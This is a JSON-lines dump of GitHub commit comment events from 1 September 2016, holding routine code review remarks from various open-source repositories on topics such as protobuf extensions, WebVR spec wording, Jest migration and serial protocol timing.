{"id":"4505095849","type":"CommitCommentEvent","actor":{"login":"sergiocampama"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":18870576,"position":16,"line":34,"path":"objectivec/google/protobuf/Api.pbobjc.m","commit_id":"58af83650bce2bad941f7f02243e069b385fb37b","created_at":"2016-09-01T21:00:20Z","updated_at":"2016-09-01T21:00:20Z","body":"direct"}},"created_at":"2016-09-01T21:00:20Z"}
{"id":"4505097450","type":"CommitCommentEvent","actor":{"login":"yolshanskiy"},"repo":{"name":"yolshanskiy2/comedy"},"payload":{"comment":{"id":18870578,"position":null,"line":null,"path":null,"commit_id":"71187cef6d5ad5432ca2960391b7cff618d0bff6","created_at":"2016-09-01T21:00:35Z","updated_at":"2016-09-01T21:00:35Z","body":"why did you do it?"}},"created_at":"2016-09-01T21:00:35Z"}
{"id":"4505099324","type":"CommitCommentEvent","actor":{"login":"MikeSpreitzer"},"repo":{"name":"containercafe/containercafe"},"payload":{"comment":{"id":18870580,"position":5,"line":50,"path":"ansible/roles/k8sm-master/templates/scheduler.yaml.tmpl","commit_id":"1512be787e73de77b42595f49b7f09cb9632f430","created_at":"2016-09-01T21:00:54Z","updated_at":"2016-09-01T21:00:54Z","body":"Somthing is missing here, there should have been an edit to the worker kubelet template (which is used in the non-Mesos case) to track the variable name change.\r\n\r\nIn the non-Mesos case the kubelet gets its args on its command line.  In the Mesos case the kubelet command is issued by the Mesos agent based on instructions from the k8s scheduler."}},"created_at":"2016-09-01T21:00:54Z"}
{"id":"4505101595","type":"CommitCommentEvent","actor":{"login":"JakeLoo"},"repo":{"name":"bebo/agar.io-clone"},"payload":{"comment":{"id":18870589,"position":null,"line":null,"path":null,"commit_id":"99b155c032dd079be556db0ae90ca8a2bc469942","created_at":"2016-09-01T21:01:18Z","updated_at":"2016-09-01T21:01:18Z","body":"oh yes finally! good job 💃 "}},"created_at":"2016-09-01T21:01:18Z"}
{"id":"4505104678","type":"CommitCommentEvent","actor":{"login":"thomasvl"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":18870592,"position":39,"line":39,"path":"objectivec/Tests/unittest_extension_chain_f.proto","commit_id":"58af83650bce2bad941f7f02243e069b385fb37b","created_at":"2016-09-01T21:01:52Z","updated_at":"2016-09-01T21:01:52Z","body":"G imports C, but G doesn't define any extensions, so the registry and end up just directly merging in C to shorten the runtime call chain."}},"created_at":"2016-09-01T21:01:52Z"}
{"id":"4505105062","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18870595,"position":null,"line":null,"path":null,"commit_id":"da01a1e026acb4a60d010a5a35fce77001cab86e","created_at":"2016-09-01T21:01:56Z","updated_at":"2016-09-01T21:01:56Z","body":"OK, I think I have all my inline comments done.\r\n\r\nI'm concerned about this introducing new failures that are silent to the _user_.  I know that `done` will make it so we see them, which is nice.  But I worry that there are now a bunch of cases where an error will simply be shown by `done` on the next turn in the console, and I can't tell what output the user will get.  I see \"An error occurred rendering...\" in red several times, but don't see it moved anywhere.  Have all of those situations been consolidated, and can you describe where and how that is if so?\r\n\r\nA few comments are inconsistent about stack safety.  To be clear:\r\n\r\n1. The callback of `pauseStack` is _not_ on a Pyret stack\r\n2. `runThunk` is a mechanism for _starting_ a Pyret stack, so it has to be called with no active run\r\n\r\nIt seems like maybe the comments are just inverted, and all the \"must be on the stack\" comments should really say \"stack must be clear of Pyret\".  If I read them this way, then things make much more sense.\r\n\r\nI'm still staring at the pattern of `then(... something that uses callDeferred ...).then(... something else that uses callDeferred ...)`, but I think it hangs together.  I feel like there's a useful reusable idea in there, having to do with the interleaving of stacks and promises, where each stack finishing should trigger the next promise, which starts a new stack that triggers the next promise when it finishes, and so on.\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-01T21:01:56Z"}
{"id":"4505106029","type":"CommitCommentEvent","actor":{"login":"jeremymeng"},"repo":{"name":"StackExchange/StackExchange.Redis"},"payload":{"comment":{"id":18870597,"position":null,"line":null,"path":null,"commit_id":"b2fd511bfd68f6ad2efcf8a7418e592652b60bb7","created_at":"2016-09-01T21:02:10Z","updated_at":"2016-09-01T21:02:10Z","body":"@mgravell Looks like @NickCraver added a new `StackExchange.Redis.Core.sln` when renming dnx to Core.  Maybe this file should be removed?"}},"created_at":"2016-09-01T21:02:10Z"}
{"id":"4505108610","type":"CommitCommentEvent","actor":{"login":"DigiTec"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18870602,"position":358,"line":716,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-01T21:02:38Z","updated_at":"2016-09-01T21:02:38Z","body":"Will our initial implementations live up to this statement or is this more future thinking? I ask this because there is a large assumption here for security, trust, etc... and I don't think we are quite at the point of providing that."}},"created_at":"2016-09-01T21:02:38Z"}
{"id":"4505109376","type":"CommitCommentEvent","actor":{"login":"thomasvl"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":18870603,"position":39,"line":39,"path":"objectivec/Tests/unittest_extension_chain_d.proto","commit_id":"58af83650bce2bad941f7f02243e069b385fb37b","created_at":"2016-09-01T21:02:47Z","updated_at":"2016-09-01T21:02:47Z","body":"I'll expand the comment, since B's will have C, there is no need merge it in."}},"created_at":"2016-09-01T21:02:47Z"}
{"id":"4505111411","type":"CommitCommentEvent","actor":{"login":"unterstein"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":18870606,"position":27,"line":35,"path":"src/main/scala/mesosphere/marathon/state/RunSpec.scala","commit_id":"023053ce99a751735313329e23be68de70a6bb92","created_at":"2016-09-01T21:03:10Z","updated_at":"2016-09-01T21:03:10Z","body":"As far as I understood"}},"created_at":"2016-09-01T21:03:10Z"}
{"id":"4505114574","type":"CommitCommentEvent","actor":{"login":"toji"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18870618,"position":299,"line":489,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-01T21:03:47Z","updated_at":"2016-09-01T21:03:47Z","body":"Good points all. I'll try to address them in the next update."}},"created_at":"2016-09-01T21:03:47Z"}
{"id":"4505115696","type":"CommitCommentEvent","actor":{"login":"faddat"},"repo":{"name":"faddat/gocryptotrader"},"payload":{"comment":{"id":18870620,"position":null,"line":null,"path":null,"commit_id":"4dc886d6ec094ca664686d2ee16000059fac6e48","created_at":"2016-09-01T21:03:58Z","updated_at":"2016-09-01T21:03:58Z","body":"This works now.  It'll serve the app at port 3333 if you docker-compose up\r\n\r\nNow:  What's this doohickey (impressive doohickey, mind you) intended to do?"}},"created_at":"2016-09-01T21:03:58Z"}
{"id":"4505116016","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18870621,"position":null,"line":null,"path":null,"commit_id":"e288ba8cd89af5b5cc0b40bd2415f7dd5674b0c8","created_at":"2016-09-01T21:04:01Z","updated_at":"2016-09-01T21:04:01Z","body":"@MichaelWallace30 \r\nOh no, it works correctly, but i was thinking of it more like a queue ( because originally i just copy pasted pack and unpack, which turned out to be bad. I would need to manually write down pack, and manually write down unpack). The design is good though, no need to change it. "}},"created_at":"2016-09-01T21:04:01Z"}
{"id":"4505116851","type":"CommitCommentEvent","actor":{"login":"thomasvl"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":18870624,"position":15,"line":53,"path":"objectivec/Tests/GPBMessageTests+Runtime.m","commit_id":"58af83650bce2bad941f7f02243e069b385fb37b","created_at":"2016-09-01T21:04:11Z","updated_at":"2016-09-01T21:04:11Z","body":"Done"}},"created_at":"2016-09-01T21:04:11Z"}
{"id":"4505118297","type":"CommitCommentEvent","actor":{"login":"harlyneclaussen"},"repo":{"name":"harlyneclaussen/schoolproject"},"payload":{"comment":{"id":18870632,"position":null,"line":null,"path":null,"commit_id":"222583dcb249c4c47f53012beb129a8d73e5dac6","created_at":"2016-09-01T21:04:27Z","updated_at":"2016-09-01T21:04:27Z","body":"![broncos](https://cloud.githubusercontent.com/assets/21694147/18184237/59bb4e26-7055-11e6-83f8-900cba7b805c.png)\r\n"}},"created_at":"2016-09-01T21:04:27Z"}
{"id":"4505118462","type":"CommitCommentEvent","actor":{"login":"toji"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18870635,"position":346,"line":574,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-01T21:04:29Z","updated_at":"2016-09-01T21:04:29Z","body":"Good catch, will update."}},"created_at":"2016-09-01T21:04:29Z"}
{"id":"4505121925","type":"CommitCommentEvent","actor":{"login":"kentcdodds"},"repo":{"name":"kentcdodds/match-sorter"},"payload":{"comment":{"id":18870639,"position":5,"line":5,"path":".babelrc","commit_id":"79827247780afe8785f48834a911084d347f431d","created_at":"2016-09-01T21:05:10Z","updated_at":"2016-09-01T21:05:10Z","body":"Jest's code coverage capabilities are super slick. It's awesome that I don't have to configure anything to make it work. It just does."}},"created_at":"2016-09-01T21:05:10Z"}
{"id":"4505122926","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18870644,"position":null,"line":null,"path":null,"commit_id":"c28ee67a9aa7dfe15f8b85af6ca75527aac1899c","created_at":"2016-09-01T21:05:20Z","updated_at":"2016-09-01T21:05:20Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/361/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1690)."}},"created_at":"2016-09-01T21:05:20Z"}
{"id":"4505123157","type":"CommitCommentEvent","actor":{"login":"toji"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18870646,"position":49,"line":191,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-01T21:05:22Z","updated_at":"2016-09-01T21:05:22Z","body":"😨 "}},"created_at":"2016-09-01T21:05:22Z"}
{"id":"4505124919","type":"CommitCommentEvent","actor":{"login":"kentcdodds"},"repo":{"name":"kentcdodds/match-sorter"},"payload":{"comment":{"id":18870652,"position":11,"line":10,"path":"package-scripts.js","commit_id":"79827247780afe8785f48834a911084d347f431d","created_at":"2016-09-01T21:05:42Z","updated_at":"2016-09-01T21:05:42Z","body":"I love that [`p-s`](https://github.com/kentcdodds/p-s) makes this so easy/straightforward/simple."}},"created_at":"2016-09-01T21:05:42Z"}
{"id":"4505125396","type":"CommitCommentEvent","actor":{"login":"thomasvl"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":18870653,"position":21,"line":59,"path":"objectivec/Tests/GPBMessageTests+Runtime.m","commit_id":"58af83650bce2bad941f7f02243e069b385fb37b","created_at":"2016-09-01T21:05:47Z","updated_at":"2016-09-01T21:05:47Z","body":"Done."}},"created_at":"2016-09-01T21:05:47Z"}
{"id":"4505125843","type":"CommitCommentEvent","actor":{"login":"kentcdodds"},"repo":{"name":"kentcdodds/match-sorter"},"payload":{"comment":{"id":18870655,"position":13,"line":12,"path":"package-scripts.js","commit_id":"79827247780afe8785f48834a911084d347f431d","created_at":"2016-09-01T21:05:51Z","updated_at":"2016-09-01T21:05:51Z","body":"This watch mode is a thing of beauty."}},"created_at":"2016-09-01T21:05:51Z"}
{"id":"4505130634","type":"CommitCommentEvent","actor":{"login":"kentcdodds"},"repo":{"name":"kentcdodds/match-sorter"},"payload":{"comment":{"id":18870670,"position":8,"line":28,"path":"package.json","commit_id":"79827247780afe8785f48834a911084d347f431d","created_at":"2016-09-01T21:06:45Z","updated_at":"2016-09-01T21:06:45Z","body":"To enable ES6, I simply have to install these two dependencies and boom, it picks up my existing `.babelrc` file and I don't have to do any config. It's awesome."}},"created_at":"2016-09-01T21:06:45Z"}
{"id":"4505131012","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18870673,"position":null,"line":null,"path":null,"commit_id":"7eb91c6290cf6f6b0d84c8e8a55d92d6fc650549","created_at":"2016-09-01T21:06:49Z","updated_at":"2016-09-01T21:06:49Z","body":"Re-encoding from a lossy format to another lossy format always introduces more loss, like when you save a JPEG image several times each time will get worse quality. If we take a 128Kbps audio file and transcode it again to 128Kbps that's a lot more lossy than the original, but if we transcode it to 320Kbps there is less audible loss of quality. So, at least historically, this project has transcoded at the maximum audio bitrate available to ensure the least quality loss.\r\n\r\nMaybe this would work well with https://github.com/UniversalMediaServer/UniversalMediaServer/pull/905 so at least our users who identify their networks as fast don't have to compromise on quality, but slow network users get the bandwidth benefit"}},"created_at":"2016-09-01T21:06:49Z"}
{"id":"4505132505","type":"CommitCommentEvent","actor":{"login":"kentcdodds"},"repo":{"name":"kentcdodds/match-sorter"},"payload":{"comment":{"id":18870677,"position":49,"line":73,"path":"package.json","commit_id":"79827247780afe8785f48834a911084d347f431d","created_at":"2016-09-01T21:07:06Z","updated_at":"2016-09-01T21:07:06Z","body":"Goodbye implementation-detail config!"}},"created_at":"2016-09-01T21:07:06Z"}
{"id":"4505135494","type":"CommitCommentEvent","actor":{"login":"kentcdodds"},"repo":{"name":"kentcdodds/match-sorter"},"payload":{"comment":{"id":18870685,"position":58,"line":59,"path":"package.json","commit_id":"79827247780afe8785f48834a911084d347f431d","created_at":"2016-09-01T21:07:38Z","updated_at":"2016-09-01T21:07:38Z","body":"I prefer to keep things local to the project. This is definitely not necessary."}},"created_at":"2016-09-01T21:07:38Z"}
{"id":"4505137924","type":"CommitCommentEvent","actor":{"login":"kentcdodds"},"repo":{"name":"kentcdodds/match-sorter"},"payload":{"comment":{"id":18870688,"position":59,"line":60,"path":"package.json","commit_id":"79827247780afe8785f48834a911084d347f431d","created_at":"2016-09-01T21:08:06Z","updated_at":"2016-09-01T21:08:06Z","body":"This sped up Jest a bit. I don't need to use jsdom for my tests (this is just a node lib) so this is great."}},"created_at":"2016-09-01T21:08:06Z"}
{"id":"4505138794","type":"CommitCommentEvent","actor":{"login":"kentcdodds"},"repo":{"name":"kentcdodds/match-sorter"},"payload":{"comment":{"id":18870690,"position":2,"line":2,"path":"src/index.test.js","commit_id":"79827247780afe8785f48834a911084d347f431d","created_at":"2016-09-01T21:08:16Z","updated_at":"2016-09-01T21:08:16Z","body":"For this small project, moving from AVA to Jest was pretty simple because I actually was only using the AVA API in one place and all my tests are actually abstracted away from AVA. So I had to rewrite very little to migrate from AVA to Jest."}},"created_at":"2016-09-01T21:08:16Z"}
{"id":"4505140588","type":"CommitCommentEvent","actor":{"login":"thomasvl"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":18870697,"position":16,"line":34,"path":"objectivec/google/protobuf/Api.pbobjc.m","commit_id":"58af83650bce2bad941f7f02243e069b385fb37b","created_at":"2016-09-01T21:08:37Z","updated_at":"2016-09-01T21:08:37Z","body":"Done."}},"created_at":"2016-09-01T21:08:37Z"}
{"id":"4505141350","type":"CommitCommentEvent","actor":{"login":"claudijd"},"repo":{"name":"mozilla/ssh_scan"},"payload":{"comment":{"id":18870700,"position":5,"line":7,"path":"spec/ssh_scan/integration.sh","commit_id":"d290ac1c316d5c560d91f60334b047e1a514f4ea","created_at":"2016-09-01T21:08:46Z","updated_at":"2016-09-01T21:08:46Z","body":"What what happening here is that when travis is being all smart, it builds your own gemset, when that happens the files you have in ./bin will be in your path then, this was faking out the new integration binary selection conditional and trying to run from a gem that wasn't even installed on a src integration run.  TIL!"}},"created_at":"2016-09-01T21:08:46Z"}
{"id":"4505147937","type":"CommitCommentEvent","actor":{"login":"mikeller"},"repo":{"name":"universam1/openLRSng"},"payload":{"comment":{"id":18870728,"position":null,"line":null,"path":null,"commit_id":"c4d966bdc04755eb56506813d61dae8ed7e05730","created_at":"2016-09-01T21:10:01Z","updated_at":"2016-09-01T21:10:01Z","body":"> Yes I do agree, compatibility is the goal although I really would like to be able to configure on the field... :(\r\n\r\nTotally agreed. As I stated before, the protocol to configure an openLRSng module over serial is already implemented on the openLRSng side, it's what the configurator uses to do its job. It's a protocol that uses binary messages, similar to the MSP protocol used by multiwii and derivatives. Based on my work on Betaflight I think this is not a bad protocol to use when implementing configuration support in OpenTx (or other controller firmware), it is just a matter of somebody sitting down and doing the work on the controller firmware side. I'd be happy to do the work required to port the serial protocol handler from JavaScript to C for this, but I've got too much on my plate already with Betaflight, so I don't want to get involved in controller UI development (and there certainly are people around that have done more of this than me, and can get it done quicker).\r\n\r\n> Btw. I was able to get a Taranis flashed. But my sniffing was odd, the sync is 0xA7 but not 0x55... On the other hand, for the UART there is no difference whether 8e2 or 8e1 is configured. Could be working then\r\n\r\nThat odd sync makes me thing that you might be missing the beginning of the first byte. A is the binary inverse of 5 (and I am sure sync is supposed to be 0x55, since it works on my implementation). Are you using SoftSerial for this?\r\n\r\nRe 8E1 vs 8E2, to my knowledge it does matter, as sending 8E2 when the receiver expects 8E1 will mean that synchronisation is lost after every byte.\r\n\r\n> Just for the sake of the idea: Lets assume we take the opportunity for an Multi-OLRS protocol: There we choose 57600 baud 8e1 that is supported by SoftSerial very good. We would have a maximum update rate still of 288hz which is sufficient.\r\n\r\nNot quite. Taking start, stop, and parity bits into account, one message is 26 * 12bits = 314bits long. This still yields 183 Hz at 57600, which is not too shabby either.\r\n\r\nIf you could send me a sample Multiprotocal samples, I can test if that would work!\r\n\r\nWhat format do you want the samples in? At the very simplest, a valid message can be generated as one 0x55, with 25 0x00s following."}},"created_at":"2016-09-01T21:10:01Z"}
{"id":"4505149498","type":"CommitCommentEvent","actor":{"login":"DSalles"},"repo":{"name":"DSalles/Tentacles"},"payload":{"comment":{"id":18870729,"position":null,"line":null,"path":null,"commit_id":"f4b845d701669b5e0e5cd259782ea34753a5267d","created_at":"2016-09-01T21:10:19Z","updated_at":"2016-09-01T21:10:19Z","body":"added meta"}},"created_at":"2016-09-01T21:10:19Z"}
{"id":"4505152746","type":"CommitCommentEvent","actor":{"login":"antoinerousseau"},"repo":{"name":"skv-headless/react-native-scrollable-tab-view"},"payload":{"comment":{"id":18870735,"position":null,"line":null,"path":null,"commit_id":"18c4c8ef6703d9046d0fbfbeac6362a91d2e0db0","created_at":"2016-09-01T21:10:54Z","updated_at":"2016-09-01T21:10:54Z","body":"what happened?"}},"created_at":"2016-09-01T21:10:54Z"}
{"id":"4505156687","type":"CommitCommentEvent","actor":{"login":"MoOx"},"repo":{"name":"kentcdodds/match-sorter"},"payload":{"comment":{"id":18870736,"position":65,"line":66,"path":"package.json","commit_id":"79827247780afe8785f48834a911084d347f431d","created_at":"2016-09-01T21:11:40Z","updated_at":"2016-09-01T21:11:40Z","body":"Wow, Jest handles coverage... ❤️"}},"created_at":"2016-09-01T21:11:40Z"}
{"id":"4505166042","type":"CommitCommentEvent","actor":{"login":"pdettori"},"repo":{"name":"containercafe/containercafe"},"payload":{"comment":{"id":18870752,"position":5,"line":50,"path":"ansible/roles/k8sm-master/templates/scheduler.yaml.tmpl","commit_id":"1512be787e73de77b42595f49b7f09cb9632f430","created_at":"2016-09-01T21:13:28Z","updated_at":"2016-09-01T21:13:28Z","body":"I think the problem is that there was no code for netargs in the worker kubelet, so I would have expected added code for that, not variable name changes there."}},"created_at":"2016-09-01T21:13:28Z"}
{"id":"4505173730","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"istex/istex-google-scholar"},"payload":{"comment":{"id":18870769,"position":14,"line":26,"path":"main.js","commit_id":"889b67fb16d50a2a77c6afaa841df01f87e471bd","created_at":"2016-09-01T21:14:58Z","updated_at":"2016-09-01T21:14:58Z","body":"Pour info, si tu as besoin de faire des requêtes HTTP, tu peux aussi utiliser un des modules suivants qui sont très connus et très populaires:\r\nhttps://www.npmjs.com/package/request\r\nhttps://www.npmjs.com/package/superagent\r\n\r\nIls sont très utiles qd on veut faire des choses un peu plus complexes avec http"}},"created_at":"2016-09-01T21:14:58Z"}
{"id":"4505176826","type":"CommitCommentEvent","actor":{"login":"joolswills"},"repo":{"name":"RetroPie/RetroPie-Setup"},"payload":{"comment":{"id":18870777,"position":null,"line":null,"path":null,"commit_id":"a5a9efcd49f0c25ddb47a39366c6404eaf87f6e4","created_at":"2016-09-01T21:15:34Z","updated_at":"2016-09-01T21:15:34Z","body":"just FYI - I have moved this into the main reicast module, and have fixed the hardcoded path"}},"created_at":"2016-09-01T21:15:34Z"}
{"id":"4505180220","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"istex/istex-google-scholar"},"payload":{"comment":{"id":18870783,"position":6,"line":16,"path":"package.json","commit_id":"889b67fb16d50a2a77c6afaa841df01f87e471bd","created_at":"2016-09-01T21:16:16Z","updated_at":"2016-09-01T21:16:16Z","body":"Je ne pige pas très bien où tu as trouvé ce module https ? c'est pas le module natif nodejs par hasard ?\r\ncf https://nodejs.org/api/https.html\r\n\r\ncar si c'est le cas, pas besoin de l'installer via npm puisqu'il est en natif directement dans nodejs."}},"created_at":"2016-09-01T21:16:16Z"}
{"id":"4505186921","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"JESS44903/coffee"},"payload":{"comment":{"id":18870793,"position":63,"line":63,"path":"index.html","commit_id":"5d89686871a2e11c18607cfcd763e6e7d21c3777","created_at":"2016-09-01T21:17:33Z","updated_at":"2016-09-01T21:17:33Z","body":"Press maybe?"}},"created_at":"2016-09-01T21:17:33Z"}
{"id":"4505188664","type":"CommitCommentEvent","actor":{"login":"mossprescott"},"repo":{"name":"mossprescott/quasar"},"payload":{"comment":{"id":18870796,"position":71,"line":71,"path":"core/src/test/scala/quasar/std/StdLibSpec.scala","commit_id":"df848119c376d80a427b5a68237ae96980886147","created_at":"2016-09-01T21:17:53Z","updated_at":"2016-09-01T21:17:53Z","body":"This all makes sense and I think we want to move on this sooner rather than later, just so we don't have to explain them to the rest of the team too many more times.\r\n\r\nOne thing we'll have to figure out is where all the \"metadata\" about the funcs will live. I suppose some of it could be declared in QScript along with the MapFuncs, but some of it refers to LogicalPlan so it doesn't belong there. \r\n\r\nAnother way of looking at this: Is it possible to define the codomain, domain, typer, untyper, and simplify, all in a way that isn't tied to either LogicalPlan of QScript? If so, then these functions could stand on their own (and we would have more choices of how and where to test their translations.)"}},"created_at":"2016-09-01T21:17:53Z"}
{"id":"4505196063","type":"CommitCommentEvent","actor":{"login":"kamcio96"},"repo":{"name":"BlockedServers/tracker"},"payload":{"comment":{"id":18870814,"position":38,"line":0,"path":"blockedservers","commit_id":"4edcf1703a009f520b01065de9f9af27442d7983","created_at":"2016-09-01T21:19:22Z","updated_at":"2016-09-01T21:19:22Z","body":"heh, nice name :D"}},"created_at":"2016-09-01T21:19:22Z"}
{"id":"4505196835","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":18870817,"position":null,"line":null,"path":null,"commit_id":"b4efc42c65dda9b05c0fe388e50ebd2aef293d74","created_at":"2016-09-01T21:19:30Z","updated_at":"2016-09-01T21:19:30Z","body":"[R/parse-comorbid.R:400:13:](https://github.com/jackwasey/icd/blob/b4efc42c65dda9b05c0fe388e50ebd2aef293d74/R/parse-comorbid.R#L400) *warning:* **no visible global function definition for ‘str_split_fixed’**\n```r\n​  todrop <- str_split_fixed(todrop, \",\", n = longest)\n            ^~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-01T21:19:30Z"}
{"id":"4505200422","type":"CommitCommentEvent","actor":{"login":"fridlinimrod"},"repo":{"name":"fridlinimrod/homestyle"},"payload":{"comment":{"id":18870827,"position":30,"line":27,"path":"app/js/directives/directives.js","commit_id":"e51fe2106acfc85423ea4892dd1fc7ebb1a23af5","created_at":"2016-09-01T21:20:15Z","updated_at":"2016-09-01T21:20:15Z","body":"makes sense. so you suggest just a private function in the link function?"}},"created_at":"2016-09-01T21:20:15Z"}
{"id":"4505200901","type":"CommitCommentEvent","actor":{"login":"jswrenn"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18870828,"position":103,"line":55,"path":"src/web/js/error-ui.js","commit_id":"da01a1e026acb4a60d010a5a35fce77001cab86e","created_at":"2016-09-01T21:20:19Z","updated_at":"2016-09-01T21:20:19Z","body":"@blerner's comment is correct for this commit, but incorrect now. It was totally a typo that both branches called `resolve`. "}},"created_at":"2016-09-01T21:20:19Z"}
{"id":"4505207767","type":"CommitCommentEvent","actor":{"login":"mscherer"},"repo":{"name":"ansible/ansible-modules-core"},"payload":{"comment":{"id":18870842,"position":null,"line":null,"path":null,"commit_id":"5728ef89f0764be9066fc1bf0fbbf7785e60f4cb","created_at":"2016-09-01T21:21:45Z","updated_at":"2016-09-01T21:21:45Z","body":"Can you open a new issue ?"}},"created_at":"2016-09-01T21:21:45Z"}
{"id":"4505207815","type":"CommitCommentEvent","actor":{"login":"JFDaly"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18870843,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T21:21:46Z","updated_at":"2016-09-01T21:21:46Z","body":"Everything is in working order for my stuff. Thanks much!"}},"created_at":"2016-09-01T21:21:46Z"}
{"id":"4505210984","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"CaioSaud/EDL"},"payload":{"comment":{"id":18870851,"position":null,"line":null,"path":null,"commit_id":"db61bcc4ef99c47f24d9b240a4eb7a2e0be15537","created_at":"2016-09-01T21:22:23Z","updated_at":"2016-09-01T21:22:23Z","body":"ok"}},"created_at":"2016-09-01T21:22:23Z"}
{"id":"4505212126","type":"CommitCommentEvent","actor":{"login":"johnkors"},"repo":{"name":"IdentityServer/IdentityServer3"},"payload":{"comment":{"id":18870856,"position":5,"line":163,"path":"source/Core/Resources/Events.resx","commit_id":"eddbb3c7d6f175b35c8f0795bf77e20d985afd98","created_at":"2016-09-01T21:22:36Z","updated_at":"2016-09-01T21:22:36Z","body":"https://github.com/IdentityServer/IdentityServer3/pull/3184"}},"created_at":"2016-09-01T21:22:36Z"}
{"id":"4505215550","type":"CommitCommentEvent","actor":{"login":"aaban786"},"repo":{"name":"aaban786/hello-world"},"payload":{"comment":{"id":18870858,"position":null,"line":null,"path":null,"commit_id":"55dcbe5b915cc0efa7aca22fee2c45bab80e8ed3","created_at":"2016-09-01T21:23:17Z","updated_at":"2016-09-01T21:23:17Z","body":"551 9\r\n51 652 0\r\n51 7521\r\nView 4\r\n@@ -447,6 +447,8 @@ def\r\ndelete_unsupported_inputs(self,\r\ndirectory):\r\n'unsafeexpr.php',\r\n'unsafeexpr2.php',\r\n'unsafeexpr3.php',\r\n+ 'variablevariable_disallowed.php',\r\n+ 'variablevariable_no_name.php',\r\n'variadic_args1.php',\r\n'constraints/tapply_is_newtype.php',\r\n'array_get_newtype.php',\r\n@@ -512,6 +514,8 @@ def\r\ndelete_unsupported_inputs(self,\r\ndirectory):\r\n'typing_fail_inherit2.php',\r\n'typing_fail_interface_extend_\r\nclass.php',\r\n'typing_fail_magic1.php',\r\n+ 'variablevariable_disallowed.php',\r\n+ 'variablevariable_no_name.php',\r\n'void_cast.php',\r\n'yield_return2.php',\r\n'yield_send1.php',\r\nhphp/hack/\r\ntest/typecheck/\r\nvariablevariable_disallowed.php\r\n..... .\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\nView 7\r\n@@ -0,0 +1,7 @@\r\n+<?hh\r\n+\r\n+function foo(): array<int> {\r\n+ $n = 10;\r\n+ $x = \"n\";\r\n+ return $$x;\r\n+}\r\nhphp/hack/\r\ntest/typecheck/\r\nvariablevariable_disallowed.php.exp\r\n..... .\r\n1\r\n2\r\nView 2\r\n@@ -0,0 +1,2 @@\r\n+File \"variablevariable_disallowed.p\r\nhp\", line 6, characters 10-12:\r\n+A valid variable name starts with a\r\nletter or underscore, followed by any\r\nnum\r\nhphp/hack/\r\ntest/typecheck/\r\nvariablevariable_disallowed.ph\r\np.no_format\r\nNo changes.\r\nView 0\r\nhphp/hack/\r\ntest/typecheck/\r\nvariablevariable_no_name.php\r\n..... .\r\n1\r\n2\r\n3\r\n4\r\n5\r\nView 5\r\n@@ -0,0 +1,5 @@\r\n+<?hh\r\n+\r\n+function foo(): array<int> {\r\n+ return $$$;\r\n+}\r\nhphp/hack/\r\ntest/typecheck/\r\nvariablevariable_no_name.php.exp\r\n..... .\r\n1\r\n2\r\nView 2\r\n@@ -0,0 +1,2 @@\r\n+File \"variablevariable_no_name.php\",\r\nline 4, characters 12-12:"}},"created_at":"2016-09-01T21:23:17Z"}
{"id":"4505217312","type":"CommitCommentEvent","actor":{"login":"JakobEriksson"},"repo":{"name":"IOOPM-UU/ioopm16"},"payload":{"comment":{"id":18870863,"position":null,"line":null,"path":null,"commit_id":"339b4620d321b092493acb8928335f19f1d1da1c","created_at":"2016-09-01T21:23:37Z","updated_at":"2016-09-01T21:23:37Z","body":"Skulle precis lägga en issue, bra timing! "}},"created_at":"2016-09-01T21:23:37Z"}
{"id":"4505217630","type":"CommitCommentEvent","actor":{"login":"eyssy12"},"repo":{"name":"eyssy12/Bluetooth-Commands"},"payload":{"comment":{"id":18870866,"position":14,"line":183,"path":"BluetoothCommandServer/MainWindow.xaml.cs","commit_id":"b8e8d037931814f0100ddcf7617b97844dfcdbda","created_at":"2016-09-01T21:23:42Z","updated_at":"2016-09-01T21:23:42Z","body":"Make \":\" a const. "}},"created_at":"2016-09-01T21:23:42Z"}
